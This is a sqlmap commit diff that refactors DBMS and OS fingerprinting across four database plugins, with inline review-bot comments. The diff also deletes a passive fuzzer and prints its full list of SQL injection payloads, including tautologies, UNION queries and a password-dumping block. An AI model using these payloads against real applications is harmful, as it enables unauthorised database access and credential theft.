Minor enhancement to show the DBMS operating system (if fingerprinted)
also when only the -b option is provided, since it is information that sqlmap obtains by parsing the DBMS banner. Got rid completely of useless passive fuzzing.
This commit is contained in:
parent
7d7170fc97
commit
66fb3c3033
|
@ -1,43 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id$
|
||||
|
||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
||||
|
||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
||||
|
||||
sqlmap is free software; you can redistribute it and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
Software Foundation version 2 of the License.
|
||||
|
||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||||
details.
|
||||
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
"""
|
||||
|
||||
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import paths
|
||||
from lib.request.connect import Connect as Request
|
||||
|
||||
|
||||
def passiveFuzzing():
|
||||
logMsg = "executing passive fuzzing to retrieve DBMS error messages"
|
||||
logger.info(logMsg)
|
||||
|
||||
fuzzVectors = open(paths.FUZZ_VECTORS, "r")
|
||||
|
||||
for fuzzVector in fuzzVectors:
|
||||
fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
|
||||
|
||||
payload = agent.payload(newValue=fuzzVector)
|
||||
Request.queryPage(payload)
|
|
@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper
|
|||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += actVer
|
||||
|
@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
formatInfo = None
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
if info:
|
||||
release = info["dbmsRelease"]
|
||||
version = info["dbmsVersion"]
|
||||
servicepack = info["dbmsServicePack"]
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if release and version and servicepack:
|
||||
banVer = "Microsoft SQL Server %s " % release
|
||||
|
@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
|
||||
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("@@VERSION")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
logger.info(logMsg)
|
||||
|
||||
randInt = str(randomInt(1))
|
||||
query = "LTRIM(STR(LEN(%s)))" % randInt
|
||||
query = "LTRIM(STR(LEN(%s)))" % randInt
|
||||
|
||||
if inject.getValue(query) == "1":
|
||||
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
|
||||
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
|
||||
version = inject.getValue(query)
|
||||
|
||||
if version == "8":
|
||||
|
@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
else:
|
||||
setDbms("Microsoft SQL Server")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("@@VERSION")
|
||||
|
||||
|
|
|
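Review bot: In the getFingerprint hunk at `@ -124,8 +123,19 @@`, `formatInfo = formatOSfp(info)` is called with whatever `bannerParser(self.banner)` returned, while the extensive branch in the next hunk guards with `if info:` before indexing `info["dbmsRelease"]`; if bannerParser can return None for an unrecognised banner, formatOSfp receives None on the new path (getFingerprint's body continues past the hunk). Wrapping the call in `if info:` keeps the two paths consistent. The same preamble is added to getFingerprint in the MySQL, Oracle and PostgreSQL sections below (hunks `@ -182,8 +181,19 @@` and the two `@ -118,7 +117,18 @@`), so the guard belongs in all four. If the later `info = bannerParser(self.banner)` inside the extensive branch is kept on the new side, it re-parses a banner already held in `info` from the top of the method and could be dropped. getFingerprint has no docstring; `"""Return the fingerprint text: an OS line parsed from the banner (when available) followed by the back-end DBMS line."""` would state the new layout.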
@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper
|
|||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += actVer
|
||||
|
@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
comVer = formatDBMSfp([comVer])
|
||||
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if info:
|
||||
# TODO: move to the XML banner file
|
||||
banVer = info['version']
|
||||
|
||||
if re.search("-log$", self.banner):
|
||||
banVer += ", logging enabled"
|
||||
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if int(kb.dbmsVersion[0]) >= 5:
|
||||
self.has_information_schema = True
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
setDbms("MySQL 5")
|
||||
self.has_information_schema = True
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
kb.dbmsVersion = [">= 5.0.0"]
|
||||
return True
|
||||
|
@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
setDbms("MySQL 4")
|
||||
kb.dbmsVersion = ["< 5.0.0"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
else:
|
||||
kb.dbmsVersion = ["< 3.22.11"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not MySQL"
|
||||
|
|
|
@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS
|
|||
from lib.core.unescaper import unescaper
|
||||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "Oracle"
|
||||
|
@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
formatInfo = None
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if info:
|
||||
banVer = info['version']
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if conf.dbms in ORACLE_ALIASES:
|
||||
setDbms("Oracle")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
setDbms("Oracle")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
elif re.search("^8", version):
|
||||
kb.dbmsVersion = ["8i"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not Oracle"
|
||||
|
|
|
@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS
|
|||
from lib.core.unescaper import unescaper
|
||||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "PostgreSQL"
|
||||
|
@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
formatInfo = None
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if info:
|
||||
banVer = info['version']
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if conf.dbms in PGSQL_ALIASES:
|
||||
setDbms("PostgreSQL")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
setDbms("PostgreSQL")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
else:
|
||||
kb.dbmsVersion = ["< 6.2.0"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not PostgreSQL"
|
||||
|
|
|
@ -1,51 +0,0 @@
|
|||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||
||6
|
||||
'||'6
|
||||
(||6)
|
||||
' OR 1=1--
|
||||
OR 1=1
|
||||
' OR '1'='1
|
||||
; OR '1'='1'
|
||||
%22+or+isnull%281%2F0%29+%2F*
|
||||
%27+OR+%277659%27%3D%277659
|
||||
%22+or+isnull%281%2F0%29+%2F*
|
||||
%27+--+
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or 1=1 /*
|
||||
or 1=1--
|
||||
' or 'a'='a
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
Admin' OR '
|
||||
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
|
||||
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
|
||||
' having 1=1--
|
||||
' having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
|
||||
' or 1 in (select @@version)--
|
||||
' union all select @@version--
|
||||
' OR 'unusual' = 'unusual'
|
||||
' OR 'something' = 'some'+'thing'
|
||||
' OR 'text' = N'text'
|
||||
' OR 'something' like 'some%'
|
||||
' OR 2 > 1
|
||||
' OR 'text' > 't'
|
||||
' OR 'whatever' in ('whatever')
|
||||
' OR 2 BETWEEN 1 and 3
|
||||
' or username like char(37);
|
||||
' union select * from users where login = char(114,111,111,116);
|
||||
' union select
|
||||
Password:*/=1--
|
||||
UNI/**/ON SEL/**/ECT
|
||||
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
|
||||
'; EXEC ('SEL' + 'ECT US' + 'ER')
|
||||
'/**/OR/**/1/**/=/**/1
|
||||
' or 1/*
|
||||
+or+isnull%281%2F0%29+%2F*
|
||||
%27+OR+%277659%27%3D%277659
|
||||
%22+or+isnull%281%2F0%29+%2F*
|
||||
%27+--+&password=
|
||||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||||
@var select @var as var into temp end --
|
|
@ -6,18 +6,34 @@
|
|||
<info type="Windows"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*7\.0">
|
||||
<info type="Windows" distrib="Vista"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*7\.0.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="Vista" sp="1"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*6\.0">
|
||||
<info type="Windows" distrib="2003"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*6\.0.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="2003" sp="1"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.1">
|
||||
<info type="Windows" distrib="XP"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.1.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="XP" sp="1"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.0">
|
||||
<info type="Windows" distrib="2000"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.0.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="2000" sp="1"/>
|
||||
</regexp>
|
||||
|
|
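Review bot: The `Service Pack (\d)` rows capture the service-pack digit but every one of their `<info>` elements hardcodes `sp="1"`, so unless bannerParser substitutes the captured group a host on SP2 or SP3 is reported as SP1. Each plain row such as `Microsoft.*5\.1` also matches every banner its `Service Pack` sibling matches, so which `<info>` wins depends on whether the parser stops at the first hit or keeps the last; a one-line comment at the top of the file stating that rule would help. If these patterns are meant to hit the `Windows NT x.y` token of @@VERSION, Vista reports NT 6.0 and Server 2003 reports NT 5.2, so the `7\.0`→Vista and `6\.0`→2003 rows look off and should be checked against a real banner. Which of the rows are new is not recoverable from this rendering, so the remarks apply to whichever were added.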